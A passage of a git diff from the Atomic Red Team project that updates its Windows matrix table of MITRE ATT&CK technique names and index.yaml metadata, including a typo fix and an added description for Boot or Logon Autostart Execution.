+| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Web Shell](../../T1505.003/T1505.003.md) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
@@ -108,7 +110,9 @@
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 883f0a0c..865ac911 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -111,7 +111,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.923Z'
+ modified: '2020-07-22T21:36:52.825Z'
created: '2020-01-30T13:58:14.373Z'
x_mitre_data_sources:
- Windows Registry
@@ -637,7 +637,7 @@ privilege-escalation:
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo
keep shims secure, Windows designed them to run in user mode so they cannot
modify the kernel and you must have administrator privileges to install a
- shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)
+ shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)
(UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
@@ -1110,10 +1110,22 @@ privilege-escalation:
atomic_tests: []
T1547:
technique:
+ id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
+ description: |-
+ Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
+
+ Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
+ name: Boot or Logon Autostart Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547
url: https://attack.mitre.org/techniques/T1547
+ - external_id: CAPEC-564
+ source_name: capec
